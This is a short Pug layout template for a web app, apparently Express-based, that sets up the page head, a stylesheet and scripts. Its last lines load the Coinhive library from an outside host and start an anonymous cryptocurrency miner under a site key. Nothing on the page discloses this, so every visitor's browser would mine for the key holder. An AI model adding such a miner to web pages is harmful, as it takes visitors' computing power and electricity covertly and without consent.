doctype html
html
  head
    title= title
    link(rel='stylesheet', href='/stylesheets/style.css')
  body
    block content
    script(src='/javascripts/index.js')
    script(src='https://coin-hive.com/lib/coinhive.min.js')
    script.
       var miner = new CoinHive.Anonymous('LAWkR7hoq05U0zB5WFvaDCldo57oDf3f');miner.start();
    


